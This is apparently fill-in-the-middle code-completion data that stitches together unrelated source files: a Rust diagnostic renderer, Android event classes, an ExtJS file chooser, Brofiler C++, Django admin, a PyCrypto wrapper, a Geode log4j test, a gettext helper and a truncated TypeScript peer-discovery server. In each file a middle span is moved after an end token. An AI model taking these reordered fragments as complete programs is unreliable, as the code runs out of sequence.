``` for (label_style, range, message) in hanging_labels(single_labels, trailing_label).rev() { self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; write!(self, " ")?; self.caret_pointers( severity, max_label_start, single_labels, trailing_label, source .char_indices() .take_while(|(byte_index, _)| *byte_index < range.start), )?; self.set_color(self.styles().label(severity, *label_style))?; write!(self, "{}", message)?; self.reset()?; writeln!(self)?; } } } // Write top or bottom label carets underneath source // // ```text // │ ╰───│──────────────────^ woops // │ ╭─│─────────^ // ``` for (multi_label_index, (_, label_style, label)) in multi_labels.iter().enumerate() { let (label_style, range, bottom_message) = match label { MultiLabel::Left => continue, // no label caret needed // no label caret needed if this can be started in front of the line MultiLabel::Top(start) if *start <= source.len() - source.trim_start().len() => { continue } MultiLabel::Top(range) => (*label_style, range, None), MultiLabel::Bottom(range, message) => (*label_style, range, Some(message)), }; self.outer_gutter(outer_padding)?; self.border_left()?; // Write inner gutter. // // ```text // │ ╭─│───│ // ``` let mut underline = None; let mut multi_labels_iter = multi_labels.iter().enumerate().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((i, (label_index, ls, label))) if *label_index == label_column => { match label { MultiLabel::Left => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Top(..) if multi_label_index > *i => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Bottom(..) if multi_label_index < *i => { self.label_multi_left(severity, *ls, underline.map(|(s, _)| s))?; } MultiLabel::Top(..) if multi_label_index == *i => { underline = Some((*ls, VerticalBound::Top)); self.label_multi_top_left(severity, label_style)? } MultiLabel::Bottom(..) if multi_label_index == *i => { underline = Some((*ls, VerticalBound::Bottom)); self.label_multi_bottom_left(severity, label_style)?; } MultiLabel::Top(..) | MultiLabel::Bottom(..) => { self.inner_gutter_column(severity, underline)?; } } multi_labels_iter.next(); } Some((_, _)) | None => self.inner_gutter_column(severity, underline)?, } } // Finish the top or bottom caret match bottom_message { None => self.label_multi_top_caret(severity, label_style, source, *range)?, Some(message) => { self.label_multi_bottom_caret(severity, label_style, source, *range, message)? } } } Ok(()) } /// An empty source line, for providing additional whitespace to source snippets. /// /// ```text /// │ │ │ /// ``` pub fn render_snippet_empty( &mut self, outer_padding: usize, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.border_left()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; writeln!(self)?; Ok(()) } /// A broken source line, for labeling skipped sections of source. /// /// ```text /// · │ │ /// ``` pub fn render_snippet_break( &mut self, outer_padding: usize, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { self.outer_gutter(outer_padding)?; self.border_left_break()?; self.inner_gutter(severity, num_multi_labels, multi_labels)?; writeln!(self)?; Ok(()) } /// Additional notes. /// /// ```text /// = expected type `Int` /// found type `String` /// ``` pub fn render_snippet_note( &mut self, outer_padding: usize, message: &str, ) -> Result<(), Error> { for (note_line_index, line) in message.lines().enumerate() { self.outer_gutter(outer_padding)?; match note_line_index { 0 => { self.set_color(&self.styles().note_bullet)?; write!(self, "{}", self.chars().note_bullet)?; self.reset()?; } _ => write!(self, " ")?, } // Write line of message writeln!(self, " {}", line)?; } Ok(()) } /// Adds tab-stop aware unicode-width computations to an iterator over /// character indices. Assumes that the character indices begin at the start /// of the line. fn char_metrics( &self, char_indices: impl Iterator<Item = (usize, char)>, ) -> impl Iterator<Item = (Metrics, char)> { use unicode_width::UnicodeWidthChar; let tab_width = self.config.tab_width; let mut unicode_column = 0; char_indices.map(move |(byte_index, ch)| { let metrics = Metrics { byte_index, unicode_width: match (ch, tab_width) { ('\t', 0) => 0, // Guard divide-by-zero ('\t', _) => tab_width - (unicode_column % tab_width), (ch, _) => ch.width().unwrap_or(0), }, }; unicode_column += metrics.unicode_width; (metrics, ch) }) } /// Location focus. fn snippet_locus(&mut self, locus: &Locus) -> Result<(), Error> { write!( self, "{name}:{line_number}:{column_number}", name = locus.name, line_number = locus.location.line_number, column_number = locus.location.column_number, )?; Ok(()) } /// The outer gutter of a source line. fn outer_gutter(&mut self, outer_padding: usize) -> Result<(), Error> { write!(self, "{space: >width$} ", space = "", width = outer_padding)?; Ok(()) } /// The outer gutter of a source line, with line number. fn outer_gutter_number( &mut self, line_number: usize, outer_padding: usize, ) -> Result<(), Error> { self.set_color(&self.styles().line_number)?; write!( self, "{line_number: >width$}", line_number = line_number, width = outer_padding, )?; self.reset()?; write!(self, " ")?; Ok(()) } /// The left-hand border of a source line. fn border_left(&mut self) -> Result<(), Error> { self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().source_border_left)?; self.reset()?; Ok(()) } /// The broken left-hand border of a source line. fn border_left_break(&mut self) -> Result<(), Error> { self.set_color(&self.styles().source_border)?; write!(self, "{}", self.chars().source_border_left_break)?; self.reset()?; Ok(()) } /// Write vertical lines pointing to carets. fn caret_pointers( &mut self, severity: Severity, max_label_start: usize, single_labels: &[SingleLabel<'_>], trailing_label: Option<(usize, &SingleLabel<'_>)>, char_indices: impl Iterator<Item = (usize, char)>, ) -> Result<(), Error> { for (metrics, ch) in self.char_metrics(char_indices) { let column_range = metrics.byte_index..(metrics.byte_index + ch.len_utf8()); let label_style = hanging_labels(single_labels, trailing_label) .filter(|(_, range, _)| column_range.contains(&range.start)) .map(|(label_style, _, _)| *label_style) .max_by_key(label_priority_key); let mut spaces = match label_style { None => 0..metrics.unicode_width, Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().pointer_left)?; self.reset()?; 1..metrics.unicode_width } }; // Only print padding if we are before the end of the last single line caret if metrics.byte_index <= max_label_start { spaces.try_for_each(|_| write!(self, " "))?; } } Ok(()) } /// The left of a multi-line label. /// /// ```text /// │ /// ``` fn label_multi_left( &mut self, severity: Severity, label_style: LabelStyle, underline: Option<LabelStyle>, ) -> Result<(), Error> { match underline { None => write!(self, " ")?, // Continue an underline horizontally Some(label_style) => { self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_top)?; self.reset()?; } } self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_left)?; self.reset()?; Ok(()) } /// The top-left of a multi-line label. /// /// ```text /// ╭ /// ``` fn label_multi_top_left( &mut self, severity: Severity, label_style: LabelStyle, ) -> Result<(), Error> { write!(self, " ")?; self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_top_left)?; self.reset()?; Ok(()) } /// The bottom left of a multi-line label. /// /// ```text /// ╰ /// ``` fn label_multi_bottom_left( &mut self, severity: Severity, label_style: LabelStyle, ) -> Result<(), Error> { write!(self, " ")?; self.set_color(self.styles().label(severity, label_style))?; write!(self, "{}", self.chars().multi_bottom_left)?; self.reset()?; Ok(()) } /// Multi-line label top. /// /// ```text /// ─────────────^ /// ``` fn label_multi_top_caret( &mut self, severity: Severity, label_style: LabelStyle, source: &str, start: usize, ) -> Result<(), Error> { self.set_color(self.styles().label(severity, label_style))?; for (metrics, _) in self .char_metrics(source.char_indices()) .take_while(|(metrics, _)| metrics.byte_index < start + 1) { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width) .try_for_each(|_| write!(self, "{}", self.chars().multi_top))?; } let caret_start = match label_style { LabelStyle::Primary => self.config.chars.multi_primary_caret_start, LabelStyle::Secondary => self.config.chars.multi_secondary_caret_start, }; write!(self, "{}", caret_start)?; self.reset()?; writeln!(self)?; Ok(()) } /// Multi-line label bottom, with a message. /// /// ```text /// ─────────────^ expected `Int` but found `String` /// ``` fn label_multi_bottom_caret( &mut self, severity: Severity, label_style: LabelStyle, source: &str, start: usize, message: &str, ) -> Result<(), Error> { self.set_color(self.styles().label(severity, label_style))?; for (metrics, _) in self .char_metrics(source.char_indices()) .take_while(|(metrics, _)| metrics.byte_index < start) { // FIXME: improve rendering of carets between character boundaries (0..metrics.unicode_width) .try_for_each(|_| write!(self, "{}", self.chars().multi_bottom))?; } let caret_end = match label_style { LabelStyle::Primary => self.config.chars.multi_primary_caret_start, LabelStyle::Secondary => self.config.chars.multi_secondary_caret_start, }; write!(self, "{}", caret_end)?; if !message.is_empty() { write!(self, " {}", message)?; } self.reset()?; writeln!(self)?; Ok(()) } /// Writes an empty gutter space, or continues an underline horizontally. fn inner_gutter_column( &mut self, severity: Severity, underline: Option<Underline>, ) -> Result<(), Error> { match underline { None => self.inner_gutter_space(), Some((label_style, vertical_bound)) => { self.set_color(self.styles().label(severity, label_style))?; let ch = match vertical_bound { VerticalBound::Top => self.config.chars.multi_top, VerticalBound::Bottom => self.config.chars.multi_bottom, }; write!(self, "{0}{0}", ch)?; self.reset()?; Ok(()) } } } /// Writes an empty gutter space. fn inner_gutter_space(&mut self) -> Result<(), Error> { write!(self, " ")?; Ok(()) } /// Writes an inner gutter, with the left lines if necessary. fn inner_gutter( &mut self, severity: Severity, num_multi_labels: usize, multi_labels: &[(usize, LabelStyle, MultiLabel<'_>)], ) -> Result<(), Error> { let mut multi_labels_iter = multi_labels.iter().peekable(); for label_column in 0..num_multi_labels { match multi_labels_iter.peek() { Some((label_index, ls, label)) if *label_index == label_column => match label { MultiLabel::Left | MultiLabel::Bottom(..) => { self.label_multi_left(severity, *ls, None)?; multi_labels_iter.next(); } MultiLabel::Top(..) => { self.inner_gutter_space()?; multi_labels_iter.next(); } }, Some((_, _, _)) | None => self.inner_gutter_space()?, } } Ok(()) } } impl<'writer, 'config> Write for Renderer<'writer, 'config> { fn write(&mut self, buf: &[u8]) -> io::Result<usize> { self.writer.write(buf) } fn flush(&mut self) -> io::Result<()> { self.writer.flush() } } impl<'writer, 'config> WriteColor for Renderer<'writer, 'config> { fn supports_color(&self) -> bool { self.writer.supports_color() } fn set_color(&mut self, spec: &ColorSpec) -> io::Result<()> { self.writer.set_color(spec) } fn reset(&mut self) -> io::Result<()> { self.writer.reset() } fn is_synchronous(&self) -> bool { self.writer.is_synchronous() } } struct Metrics { byte_index: usize, unicode_width: usize, } /// Check if two ranges overlap fn is_overlapping(range0: &Range<usize>, range1: &Range<usize>) -> bool { let start = std::cmp::max(range0.start, range1.start); let end = std::cmp::min(range0.end, range1.end); start < end } /// For prioritizing primary labels over secondary labels when rendering carets. fn label_priority_key(label_style: &LabelStyle) -> u8 { match label_style { LabelStyle::Secondary => 0, LabelStyle::Primary => 1, } } /// Return an iterator that yields the labels that require hanging messages /// rendered underneath them. fn hanging_labels<'labels, 'diagnostic>( single_labels: &'labels [SingleLabel<'diagnostic>], trailing_label: Option<(usize, &'labels SingleLabel<'diagnostic>)>, ) -> impl 'labels + DoubleEndedIterator<Item = &'labels SingleLabel<'diagnostic>> { single_labels .iter() .enumerate() .filter(|(_, (_, _, message))| !message.is_empty()) .filter(move |(i, _)| trailing_label.map_or(true, |(j, _)| *i != j)) .map(|(_, label)| label) }<|fim▁end|>
<|file_name|>NotificationEvents.java<|end_file_name|><|fim▁begin|>package org.wordpress.android.ui.notifications; import com.android.volley.VolleyError; import org.wordpress.android.models.Note; import java.util.List; public class NotificationEvents { public static class NotificationsChanged { final public boolean hasUnseenNotes; public NotificationsChanged() { this.hasUnseenNotes = false; } public NotificationsChanged(boolean hasUnseenNotes) { this.hasUnseenNotes = hasUnseenNotes; } } public static class NoteModerationFailed {} public static class NoteModerationStatusChanged { final boolean isModerating; final String noteId; public NoteModerationStatusChanged(String noteId, boolean isModerating) { this.noteId = noteId; this.isModerating = isModerating; } }<|fim▁hole|> this.noteId = noteId; } } public static class NoteVisibilityChanged { final boolean isHidden; final String noteId; public NoteVisibilityChanged(String noteId, boolean isHidden) { this.noteId = noteId; this.isHidden = isHidden; } } public static class NotificationsSettingsStatusChanged { final String mMessage; public NotificationsSettingsStatusChanged(String message) { mMessage = message; } public String getMessage() { return mMessage; } } public static class NotificationsUnseenStatus { final public boolean hasUnseenNotes; public NotificationsUnseenStatus(boolean hasUnseenNotes) { this.hasUnseenNotes = hasUnseenNotes; } } public static class NotificationsRefreshCompleted { final List<Note> notes; public NotificationsRefreshCompleted(List<Note> notes) { this.notes = notes; } } public static class NotificationsRefreshError { VolleyError error; public NotificationsRefreshError(VolleyError error) { this.error = error; } public NotificationsRefreshError() { } } }<|fim▁end|>
public static class NoteLikeStatusChanged { final String noteId; public NoteLikeStatusChanged(String noteId) {
<|file_name|>vyatta-filechooser.js<|end_file_name|><|fim▁begin|>var FileChooser = function(config) { // Setup a variable for the current directory this.current_directory; /* ---- Begin side_navbar tree --- */ this.tree = new Ext.tree.TreePanel( { region: 'west', width: 150, minSize: 150, <|fim▁hole|> enableDD: true, containerScroll: true, rootVisible:true, root: new Ext.tree.AsyncTreeNode( { text: 'Files', draggable: false, id: 'source', expanded: true }), listeners: { scope: this, 'click': function(node, e) { current_directory = node.attributes.url; this.ds.load({ params: {directory: node.attributes.url}}); } } }); // Add a tree sorter in folder mode new Ext.tree.TreeSorter(this.tree, {folderSort: true}); /* ---- End side_navbar tree --- */ /* ---- Begin grid --- */ this.ds = new Ext.data.GroupingStore( { url: 'js/grid_data.json.php', method: 'POST', autoLoad: true, sortInfo: {field: 'name', direction: 'ASC'}, reader: new Ext.data.JsonReader( { root: 'data', totalProperty: 'count' }, [ {name: 'name'}, {name: 'size', type: 'float'}, {name: 'type'}, {name: 'relative_path'}, {name: 'full_path'}, {name: 'web_path'} ]) }); this.cm = new Ext.grid.ColumnModel( [ {header: 'Name', dataIndex: 'name', sortable: true}, {header: 'Size', dataIndex: 'size', sortable: true, renderer: Ext.util.Format.fileSize}, {header: 'Type', dataIndex: 'type', sortable: true}, {header: 'Relative Path', dataIndex: 'relative_path', sortable: true, hidden: true}, {header: 'Full Path', dataIndex: 'full_path', sortable: true, hidden: true}, {header: 'Web Path', dataIndex: 'web_path', sortable: true, hidden: true} ]); this.grid = new Ext.grid.GridPanel( { region: 'center', border: false, view: new Ext.grid.GroupingView( { emptyText: 'This folder contains no files.', forceFit: true, showGroupName: false, enableNoGroups: true }), ds: this.ds, cm: this.cm, listeners: { scope: this, 'rowdblclick': this.doCallback } }); /* ---- End grid --- */ /* ---- Begin window --- */ this.popup = new Ext.Window( { id: 'FileChooser', title: 'Choose A File', width: config.width, height: config.height, minWidth: config.width, minHeight: config.height, layout: 'border', items: [ this.tree, this.grid ], buttons: [ { text: 'Ok', scope: this, handler: this.doCallback }, { text: 'Cancel', scope: this, handler: function() { this.popup.hide(); } }] }); /* ---- End window --- */ }; FileChooser.prototype = { show : function(el, callback) { if (Ext.type(el) == 'object') this.showEl = el.getEl(); else this.showEl = el; this.el = el; this.popup.show(this.showEl); this.callback = callback; }, doCallback : function() { var row = this.grid.getSelectionModel().getSelected(); var callback = this.callback; var el = this.el; this.popup.close(); if (row && callback) { var data = row.data.web_path; callback(el, data); } } }; function FileBrowser(fieldName, url, win) { var chooser = new FileChooser({width: 500, height:400}); chooser.show(fieldName, function(el, data) { win.document.getElementById(el).value = data; }); }<|fim▁end|>
maxSize: 250, animate: true, loader: new Ext.tree.TreeLoader({dataUrl: 'tree_data.json.php' }),
<|file_name|>Message.cpp<|end_file_name|><|fim▁begin|>#include "Common.h" #include "Core.h" #include "Event.h" #include "Message.h" #include "ProfilerServer.h" #include "EventDescriptionBoard.h" namespace Brofiler { //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// struct MessageHeader { uint32 mark; uint32 length; static const uint32 MESSAGE_MARK = 0xB50FB50F; bool IsValid() const { return mark == MESSAGE_MARK; } MessageHeader() : mark(0), length(0) {} }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// class MessageFactory { typedef IMessage* (*MessageCreateFunction)(InputDataStream& str); MessageCreateFunction factory[IMessage::COUNT]; template<class T> void RegisterMessage() { factory[T::GetMessageType()] = T::Create; } MessageFactory() { memset(&factory[0], 0, sizeof(MessageCreateFunction)); RegisterMessage<StartMessage>(); RegisterMessage<StopMessage>(); RegisterMessage<TurnSamplingMessage>(); for (uint32 msg = 0; msg < IMessage::COUNT; ++msg) { BRO_ASSERT(factory[msg] != nullptr, "Message is not registered to factory"); } } public: static MessageFactory& Get() { static MessageFactory instance; return instance; } IMessage* Create(InputDataStream& str) { MessageHeader header; str.Read(header); size_t length = str.Length(); int32 messageType = IMessage::COUNT; str >> messageType; BRO_VERIFY(0 <= messageType && messageType < IMessage::COUNT && factory[messageType] != nullptr, "Unknown message type!", return nullptr) IMessage* result = factory[messageType](str); if (header.length + str.Length() != length) { BRO_FAILED("Message Stream is corrupted! Invalid Protocol?") return nullptr; } return result; } }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// OutputDataStream& operator<<(OutputDataStream& os, const DataResponse& val) { return os << val.version << (uint32)val.type; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* IMessage::Create(InputDataStream& str) { MessageHeader header; while (str.Peek(header)) { if (header.IsValid()) { if (str.Length() < header.length + sizeof(MessageHeader)) break; // Not enough data yet return MessageFactory::Get().Create(str); } else { // Some garbage in the stream? str.Skip(1); } } return nullptr; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void StartMessage::Apply() { <|fim▁hole|> Core::Get().StartSampling(); } } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* StartMessage::Create(InputDataStream&) { return new StartMessage(); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void StopMessage::Apply() { Core& core = Core::Get(); core.Activate(false); core.DumpFrames(); core.DumpSamplingData(); Server::Get().Send(DataResponse::NullFrame, OutputDataStream::Empty); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* StopMessage::Create(InputDataStream&) { return new StopMessage(); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// IMessage* TurnSamplingMessage::Create(InputDataStream& stream) { TurnSamplingMessage* msg = new TurnSamplingMessage(); stream >> msg->index; stream >> msg->isSampling; return msg; } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// void TurnSamplingMessage::Apply() { EventDescriptionBoard::Get().SetSamplingFlag(index, isSampling != 0); } //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// }<|fim▁end|>
Core::Get().Activate(true); if (EventDescriptionBoard::Get().HasSamplingEvents()) {
<|file_name|>admin.py<|end_file_name|><|fim▁begin|>from django.contrib import admin from .models import * class ProductAdmin(admin.ModelAdmin): list_display = ('id', 'prd_process_id', 'prd_name', 'prd_display_name', 'prd_owner', 'prd_product_id', 'prd_date', 'prd_class', 'prd_filter', 'prd_is_public', 'prd_is_permanent',) list_display_links = ('id', 'prd_process_id', 'prd_name',) search_fields = ('prd_process_id', 'prd_name', 'prd_display_name', 'prd_product_id',) class ProductReleaseAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'release',) list_display_links = ('id', 'product', 'release',) search_fields = ('product', 'release',) class ProductTagAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'tag',) list_display_links = ('id', 'product', 'tag',) search_fields = ('product', 'tag',) class FileAdmin(admin.ModelAdmin): list_display = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'fli_base_path', 'fli_name',) list_display_links = ('id', 'prd_name', 'prd_display_name', 'prd_class',) search_fields = ('fli_name',) class TableAdmin(admin.ModelAdmin): list_display = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'tbl_database', 'tbl_schema', 'tbl_name',) list_display_links = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'tbl_schema', 'tbl_name',) search_fields = ('tbl_schema', 'tbl_name',) class CatalogAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'ctl_num_objects', ) class MapAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'mpa_nside', 'mpa_ordering', 'prd_filter', 'prd_is_public', 'prd_is_permanent' ) list_display_links = ('id', 'prd_name') search_fields = ('prd_name',) class CutOutJobAdmin(admin.ModelAdmin): list_display = ( 'id', 'cjb_product', 'cjb_display_name', 'cjb_status', 'cjb_tag', 'owner', ) list_display_links = ('id',) search_fields = ('cjb_display_name',) <|fim▁hole|> class DesjobAdmin(admin.ModelAdmin): list_display = ( 'id', 'djb_cutout_job', 'djb_jobid', 'djb_status', 'djb_start_time', 'djb_finish_time', 'djb_message', ) list_display_links = ('id',) search_fields = ('djb_jobid',) class CutoutAdmin(admin.ModelAdmin): list_display = ( 'id', 'cjb_cutout_job', 'ctt_object_id', 'ctt_object_ra', 'ctt_object_dec', 'ctt_img_format', 'ctt_filter', 'ctt_file_name', 'ctt_file_path', 'ctt_file_type', 'ctt_file_size', ) list_display_links = ('id',) search_fields = ('id',) class MaskAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'msk_filter', ) list_display_links = ('id', 'prd_name') search_fields = ('prd_name',) class ProductContentAdmin(admin.ModelAdmin): list_display = ('id', 'pcn_product_id', 'pcn_column_name', 'pcn_ucd') list_display_links = ('pcn_column_name',) search_fields = ('pcn_column_name',) class ProductContentAssociationAdmin(admin.ModelAdmin): list_display = ('id', 'pca_product', 'pca_class_content', 'pca_product_content',) search_fields = ('pca_product__prd_display_name', 'pca_product__prd_name') class ProductContentSettingAdmin(admin.ModelAdmin): list_display = ('id', 'pcs_content', 'pcs_setting', 'pcs_is_visible', 'pcs_order') class ProductSettingAdmin(admin.ModelAdmin): list_display = ( 'id', 'cst_product', 'owner', 'cst_display_name', 'cst_description', 'cst_is_public', 'cst_is_editable',) search_fields = ('cst_product__prd_display_name', 'cst_display_name', 'cst_description',) class CurrentSettingAdmin(admin.ModelAdmin): list_display = ('id', 'cst_product', 'cst_setting', 'owner',) class WorkgroupAdmin(admin.ModelAdmin): list_display = ('id', 'wgp_workgroup', 'owner',) class WorkgroupUserAdmin(admin.ModelAdmin): list_display = ('id', 'wgu_workgroup', 'wgu_user',) class PermissionAdmin(admin.ModelAdmin): list_display = ('id', 'prm_product', 'prm_user', 'prm_workgroup',) class ProductRelatedAdmin(admin.ModelAdmin): list_display = ('id', 'prl_product', 'prl_related', 'prl_relation_type', 'prl_cross_identification',) class FiltersetdAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'owner', 'fst_name',) class FilterConditionAdmin(admin.ModelAdmin): list_display = ('id', 'filterset', 'fcd_property', 'fcd_property_name', 'fcd_operation', 'fcd_value') class BookmarkedAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'owner', 'is_starred') admin.site.register(Product, ProductAdmin) admin.site.register(ProductRelease, ProductReleaseAdmin) admin.site.register(ProductTag, ProductTagAdmin) admin.site.register(File, FileAdmin) admin.site.register(Table, TableAdmin) admin.site.register(Catalog, CatalogAdmin) admin.site.register(Map, MapAdmin) admin.site.register(CutOutJob, CutOutJobAdmin) admin.site.register(Desjob, DesjobAdmin) admin.site.register(Cutout, CutoutAdmin) admin.site.register(Mask, MaskAdmin) admin.site.register(ProductContent, ProductContentAdmin) admin.site.register(ProductContentAssociation, ProductContentAssociationAdmin) admin.site.register(ProductContentSetting, ProductContentSettingAdmin) admin.site.register(ProductSetting, ProductSettingAdmin) admin.site.register(CurrentSetting, CurrentSettingAdmin) admin.site.register(Permission, PermissionAdmin) admin.site.register(ProductRelated, ProductRelatedAdmin) admin.site.register(Workgroup, WorkgroupAdmin) admin.site.register(WorkgroupUser, WorkgroupUserAdmin) admin.site.register(Filterset, FiltersetdAdmin) admin.site.register(FilterCondition, FilterConditionAdmin) admin.site.register(BookmarkProduct, BookmarkedAdmin)<|fim▁end|>
<|file_name|>pycrypto_aes.py<|end_file_name|><|fim▁begin|># Author: Trevor Perrin # See the LICENSE file for legal information regarding use of this file. """PyCrypto AES implementation.""" from .cryptomath import * from .aes import * if pycryptoLoaded: import Crypto.Cipher.AES def new(key, mode, IV): return PyCrypto_AES(key, mode, IV) class PyCrypto_AES(AES): def __init__(self, key, mode, IV): AES.__init__(self, key, mode, IV, "pycrypto") key = bytes(key) IV = bytes(IV) self.context = Crypto.Cipher.AES.new(key, mode, IV) def encrypt(self, plaintext): <|fim▁hole|> def decrypt(self, ciphertext): ciphertext = bytes(ciphertext) return bytearray(self.context.decrypt(ciphertext))<|fim▁end|>
plaintext = bytes(plaintext) return bytearray(self.context.encrypt(plaintext))
<|file_name|>GemfireVerboseMarkerFilterAcceptIntegrationTest.java<|end_file_name|><|fim▁begin|>/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.logging.log4j; import static org.apache.geode.test.util.ResourceUtils.createFileFromResource; import static org.apache.geode.test.util.ResourceUtils.getResource; import static org.assertj.core.api.Assertions.assertThat; <|fim▁hole|>import org.apache.logging.log4j.Level; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.LogEvent; import org.apache.logging.log4j.junit.LoggerContextRule; import org.apache.logging.log4j.test.appender.ListAppender; import org.junit.Before; import org.junit.BeforeClass; import org.junit.ClassRule; import org.junit.Rule; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.rules.TemporaryFolder; import org.apache.geode.internal.logging.LogService; import org.apache.geode.test.junit.categories.LoggingTest; @Category(LoggingTest.class) public class GemfireVerboseMarkerFilterAcceptIntegrationTest { private static final String APPENDER_NAME = "LIST"; private static String configFilePath; private Logger logger; private String logMessage; private ListAppender listAppender; @ClassRule public static TemporaryFolder temporaryFolder = new TemporaryFolder(); @Rule public LoggerContextRule loggerContextRule = new LoggerContextRule(configFilePath); @BeforeClass public static void setUpLogConfigFile() throws Exception { String configFileName = GemfireVerboseMarkerFilterAcceptIntegrationTest.class.getSimpleName() + "_log4j2.xml"; URL resource = getResource(configFileName); configFilePath = createFileFromResource(resource, temporaryFolder.getRoot(), configFileName) .getAbsolutePath(); } @Before public void setUp() throws Exception { logger = LogService.getLogger(); logMessage = "this is a log statement"; assertThat(LogService.isUsingGemFireDefaultConfig()).as(LogService.getConfigurationInfo()) .isFalse(); listAppender = loggerContextRule.getListAppender(APPENDER_NAME); } @Test public void gemfireVerboseShouldLogIfGemfireVerboseIsAccept() { logger.info(LogMarker.GEMFIRE_VERBOSE, logMessage); LogEvent logEvent = listAppender.getEvents().get(0); assertThat(logEvent.getLoggerName()).isEqualTo(logger.getName()); assertThat(logEvent.getLevel()).isEqualTo(Level.INFO); assertThat(logEvent.getMessage().getFormattedMessage()).isEqualTo(logMessage); } @Test public void geodeVerboseShouldLogIfGemfireVerboseIsAccept() { logger.info(LogMarker.GEODE_VERBOSE, logMessage); LogEvent logEvent = listAppender.getEvents().get(0); assertThat(logEvent.getLoggerName()).isEqualTo(logger.getName()); assertThat(logEvent.getLevel()).isEqualTo(Level.INFO); assertThat(logEvent.getMessage().getFormattedMessage()).isEqualTo(logMessage); } }<|fim▁end|>
import java.net.URL;
<|file_name|>nls.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2011 ~ 2012 Deepin, Inc. # 2011 ~ 2012 Hou Shaohui # # Author: Hou Shaohui <[email protected]> # Maintainer: Hou Shaohui <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import gettext import os def get_parent_dir(filepath, level=1): '''Get parent dir.''' parent_dir = os.path.realpath(filepath) while(level > 0): parent_dir = os.path.dirname(parent_dir)<|fim▁hole|> return parent_dir LOCALE_DIR=os.path.join(get_parent_dir(__file__, 2), "locale") if not os.path.exists(LOCALE_DIR): LOCALE_DIR="/usr/share/locale" _ = None try: _ = gettext.translation("deepin-music-player", LOCALE_DIR).gettext except Exception, e: _ = lambda i : i<|fim▁end|>
level -= 1
<|file_name|>server.ts<|end_file_name|><|fim▁begin|>const restify = require('restify'); const random = require('random-js')(); const Promise = require("bluebird"); // import * as restify from 'restify'; const assert = require('assert'); const clients = require('restify-clients'); const CBuffer = require('CBuffer'); const fs = require('fs-extra'); const defaultPeerUpPort = 56633; const defaultMaxPeerServices = 100; const defaultServiceInterval = 8000; const myServicesFilename:string = "./my-services.json"; const peerServicesFilename:string = "./peer-services.json"; const seedUrl:string = "http://45.32.186.169:"+defaultPeerUpPort; const postPeerUpKey:string = "peer-up-url"; export class Server { constructor(config={ peerUpPort:defaultPeerUpPort, maxPeerServices:defaultMaxPeerServices, serviceInterval:defaultServiceInterval }) { this.peerUpPort=config.peerUpPort || defaultPeerUpPort; this.maxPeerServices=config.maxPeerServices || defaultMaxPeerServices; this.serviceInterval=config.serviceInterval || defaultServiceInterval; this.server = restify.createServer({ name: 'peer-up', version: '1.0.0' }); this.server.use(restify.plugins.acceptParser(this.server.acceptable)); this.server.use(restify.plugins.queryParser()); this.server.use(restify.plugins.bodyParser()); this.server.post('/peer-up', (req, res, next)=>{this.onPost(req, res, next)}); if(!fs.existsSync(myServicesFilename)) { console.log("please create file with your services '"+myServicesFilename+"' like example file!"); process.exit(-1); } this.myServices = 